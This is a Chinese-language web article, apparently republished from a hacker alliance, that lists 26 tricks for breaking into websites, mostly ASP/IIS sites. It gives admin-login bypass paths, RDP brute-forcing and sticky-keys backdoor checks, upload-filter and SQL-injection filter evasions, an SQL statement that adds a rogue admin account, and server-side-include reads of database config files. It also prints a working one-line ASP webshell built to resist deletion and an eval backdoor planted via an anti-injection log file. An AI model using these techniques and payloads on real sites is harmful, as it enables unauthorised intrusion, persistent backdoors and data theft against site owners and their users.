自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

網(wǎng)站滲透技巧收集與總結(jié)

安全 應(yīng)用安全
本文總結(jié)了一些常用的網(wǎng)站滲透技巧,希望對(duì)大家有所幫助。

本文總結(jié)了一些常用的網(wǎng)站滲透技巧,希望對(duì)大家有所幫助。

網(wǎng)站滲透技巧收集與總結(jié)

1.利用網(wǎng)站過(guò)濾不嚴(yán)直接繞過(guò)后臺(tái)驗(yàn)證,在網(wǎng)站后面加上 admin/session.asp 或 admin/left.asp

2.有的網(wǎng)站進(jìn)后臺(tái)會(huì)出現(xiàn)一個(gè)腳本提示框,輸入:administrator 即可突破!admin代表以管理員身份進(jìn)入的意思。

3.有的網(wǎng)站開(kāi)了3389,入侵之前先去連接3389,嘗試弱口令或是爆破,再者就是按5次shift鍵,看看有沒(méi)前人裝過(guò)后門(mén),然后再社工密碼。

4.有時(shí)候進(jìn)后臺(tái)會(huì)彈出提示框“請(qǐng)登陸”,把地址抄寫(xiě)出來(lái)(復(fù)制不了),然后放在網(wǎng)頁(yè)源代碼分析器里,選擇瀏覽器-攔截跳轉(zhuǎn)勾選–查看即可進(jìn)入后臺(tái)!

5.突破防盜鏈訪(fǎng)問(wèn)webshell,代碼:

javascript:document.write("fuck")

回車(chē)后點(diǎn)擊GO即可進(jìn)入webshell

6.突破一流信息監(jiān)控?cái)r截系統(tǒng)訪(fǎng)問(wèn),當(dāng)小馬可以訪(fǎng)問(wèn),上傳大馬卻不行的時(shí)候,可以先用大馬跟一張圖片合并,在上傳合并后的圖片,接著數(shù)據(jù)庫(kù)備份后訪(fǎng)問(wèn)即可!

7.在拿編輯器的shell時(shí),有時(shí)增加了asp|asa|cer|php|aspx等擴(kuò)展名上傳時(shí)都被過(guò)濾了,其實(shí)只要增加aaspsp 上傳asp就會(huì)突破了。

8.有時(shí)啊D猜出表段了,但是猜不到字段的時(shí)候,可以到后臺(tái)查看源文件,搜索ID或type,一般都能找到,再到啊D里添加字段進(jìn)行猜解內(nèi)容即可突破。

9.社工后臺(tái)密碼可以用這個(gè)技巧,假如網(wǎng)站域名是:www.hx95.com管理員名稱(chēng)為hx95,可以試試密碼“hx95”和“www.hx95.com”來(lái)登陸。

10.手工注入時(shí)如果網(wǎng)站過(guò)濾了 and 1=1 and 1=2 ,可以用xor 1=1 xor 1=2 進(jìn)行判斷。

11.本地構(gòu)造上傳一句話(huà)木馬,如果提示“請(qǐng)先選擇你要上傳的文件![ 重新上傳 ]” ,說(shuō)明文件太小了,用記事本打開(kāi)再?gòu)?fù)制多幾句話(huà)從而擴(kuò)大文件大小,再上傳即可。12.用啊d跑表,跑字段名name和pass出不來(lái),顯示長(zhǎng)度超過(guò)50什么的,猜解不出的情況下,這時(shí)放在穿山甲去跑一般都能跑出來(lái)!

13.猜管理員后臺(tái)小技巧,admin/left.asp、admin/main.asp、admin/top.asp、admin/admin.asp 會(huì)現(xiàn)出菜單導(dǎo)航,然后迅雷下載全部鏈接。

14.知道表名,字段,使用SQL語(yǔ)句在A(yíng)CCESS數(shù)據(jù)庫(kù)中加個(gè)用戶(hù)名及密碼語(yǔ)句:

 Insert into admin(user,pwd)values('test','test')

15.當(dāng)獲得管理員密碼,卻拿不到管理員的帳號(hào)時(shí),到前臺(tái)隨便打開(kāi)一個(gè)新聞,找找諸如“提交者”“發(fā)布者”之類(lèi)的字眼,一般“提交者”就是管理員的帳號(hào)了。

16.爆破ASP+IIS架設(shè)的網(wǎng)站web絕對(duì)路徑,假設(shè)網(wǎng)站主頁(yè)為:http://www.xxxxx/index.asp/ 提交http://www.xxxxx.cn/fkbhvv.aspx/,fkbhvv.aspx是不存在的。

17.源碼的利用,很多網(wǎng)站用的都是網(wǎng)上下載的源碼,有的站長(zhǎng)很懶,什么也不改,然后就上傳開(kāi)通網(wǎng)站了,我們可以去下載一套,里面有很多默認(rèn)的信息值得利用。

18.把以下代碼上傳到webshell里,后綴是asp,就算別人發(fā)現(xiàn)了也刪除不了,算是超級(jí)防刪的一句話(huà)木馬了,可以很安全的留個(gè)后門(mén),菜刀連接密碼:x

 

  1. <%Eval(Request(chr(120))):Set fso=CreateObject("Scripting.FileSystemObject"):Setf=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if  f.attributes<>3939then:f.attributes=39:endif%> 

 

19.當(dāng)破解出帳號(hào)密碼卻找不到后臺(tái)的時(shí)候,可以嘗試鏈接ftp,假如域名是:www.baidu.com “ 得到的密碼為“bishi”,我們就可以試下用“xxxx”“xxxx.cn”www.xxxx.cn作為FTP 用戶(hù)名,用“bishi”:作為FTP密碼來(lái)進(jìn)行登陸,華夏聯(lián)盟成功的幾率可以很大的哦!ftp的默認(rèn)端口:21 默認(rèn)帳號(hào)密碼:test

20.有的后臺(tái)不顯示驗(yàn)證碼,難道就沒(méi)法登錄了么? 其實(shí)把一段代碼導(dǎo)入注冊(cè)表里就可以突破這個(gè)困境了,把下面的代碼保存為Code.reg,雙擊導(dǎo)入就可以了!

1 2 3 REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] "BlockXBM"=dword:00000000

21.當(dāng)網(wǎng)站不允許上傳 asp、asa、php等文件時(shí),我們可以上傳一個(gè)stm文件,代碼為:

  1. <!--#include file=”conn.asp”-->” 

(想查看什么文件就寫(xiě)什么文件名,這里我假設(shè)想查看“conn.asp”),

然后直接打開(kāi)這個(gè)stm文件的地址,再查看源代碼,“conn.asp”這個(gè)文件的代碼就一覽無(wú)遺了!

22.當(dāng)網(wǎng)站不允許上傳ASP,CGI,CER,CDX,HTR等類(lèi)型的文件時(shí),嘗試上傳一個(gè)shtm文件,內(nèi)容為:

  1. <!--#includ file="conn.asp"--> 

如果上傳成功,那太好了,訪(fǎng)問(wèn)地址就可以瀏覽conn.asp里的內(nèi)容了,這樣一來(lái),數(shù)據(jù)庫(kù)路徑也就到手啦!

23.手工檢測(cè)注入點(diǎn)彈出“你的操作已被記錄!”之類(lèi)的信息,訪(fǎng)問(wèn)這個(gè)文件:sqlin.asp,如果存在,在注入點(diǎn)后面植入一句話(huà)木馬:

‘excute(request(“TNT”))

接著用一句話(huà)木馬客戶(hù)端連接:http://www.xxx.com/sqlin.asp,上傳木馬即可拿下shell,因?yàn)楹芏喾雷⑷氤绦蚨际怯?rdquo;sqlin.asp“這個(gè)文件名來(lái)做非法記錄的數(shù)據(jù)庫(kù)。

24.旁注的話(huà),肯定是挑支持aspx的站點(diǎn)來(lái)日了,問(wèn)題是怎樣判斷呢?方法很簡(jiǎn)單,在在網(wǎng)站后面加上x(chóng)xx.aspx,如果返回“/”應(yīng)用程序中的服務(wù)器錯(cuò)誤,無(wú)法找到該資源,404畫(huà)面就說(shuō)明支持aspx木馬。

25.網(wǎng)站后面加test.php 可以查看版本

26.禁忌這兩個(gè)網(wǎng)站后臺(tái)文件 admin_index.asp manage_login.asp

責(zé)任編輯:藍(lán)雨淚 來(lái)源: 中國(guó)黑客聯(lián)盟
相關(guān)推薦

2015-02-27 16:10:25

2012-02-01 14:28:03

Java線(xiàn)程

2021-05-20 10:16:44

Web滲透漏洞

2021-10-11 10:39:13

內(nèi)網(wǎng)信息收集

2014-06-09 14:18:24

2019-12-20 14:21:26

JVM調(diào)優(yōu)垃圾回收

2012-08-09 09:42:23

HadoopNoSQL實(shí)施

2011-08-18 13:57:47

Star Schema

2013-06-27 10:26:53

Sqlmap注入

2012-11-28 14:09:41

2020-04-02 11:11:27

黑客網(wǎng)絡(luò)安全域名采集

2009-09-01 15:08:07

C#命名規(guī)范

2011-11-18 15:18:41

Junit單元測(cè)試Java

2009-08-28 17:00:50

C# for

2021-09-13 07:58:52

考試算法PAT

2018-11-26 08:49:42

CPU排查負(fù)載

2010-09-13 16:32:58

2013-07-05 16:37:50

數(shù)據(jù)丟失故障排查

2019-09-15 14:07:49

2013-12-26 13:36:27

JavaScript技巧
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)